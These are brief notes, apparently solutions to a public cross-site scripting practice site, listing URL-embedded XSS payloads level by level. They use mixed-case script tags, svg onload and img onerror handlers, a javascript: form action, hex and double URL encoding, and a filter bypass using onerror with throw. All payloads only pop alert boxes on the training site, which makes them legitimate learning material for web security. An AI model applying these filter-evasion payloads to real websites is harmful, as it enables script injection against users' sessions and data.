http://www.zixem.altervista.org/XSS/1.php?name=<script>alert(1337)</script>
http://www.zixem.altervista.org/XSS/2.php?name=<ScRIpt>alert(1337)</SCript>
Escaping %0A (n)
http://zixem.altervista.org/XSS/3.php?name=%0a<svg/onload="alert(1337)">
` <img src='htp.pngd'onerror=alert(1337) ' />
`http://zixem.altervista.org/XSS/4.php?img=htp.pngd'onerror=alert(1337)%20
` <form action="javascript:alert(1337)" method='get'>
`http://zixem.altervista.org/XSS/5.php?name=x&action=javascript:alert(1337)
Hex Encoding
`node new Buffer.from('<').toString('hex')
`
http://zixem.altervista.org/XSS/6.php?name=zxmx3csvg/onload=alert(1337)x3e
Double URL Encoding (<>)
`node encodeURIComponent(encodeURIComponent('<>'))
`
http://zixem.altervista.org/XSS/7.php?name=zxm%253csvg/onload=alert(1337)%253e
``
http://zixem.altervista.org/XSS/9.php?name=zxm<SVg/onload=confirm(1337)>
Filtered (
- http://zixem.altervista.org/XSS/10.php?name=zxm');onerror=alert;throw 1337;//
- http://zixem.altervista.org/XSS/10.php?name=zxm');onerror=confirm`1337`;//
Level 8
https://www.zixem.altervista.org/XSS/8.php?name=zxm%u003Csvg/Onload=prompt()//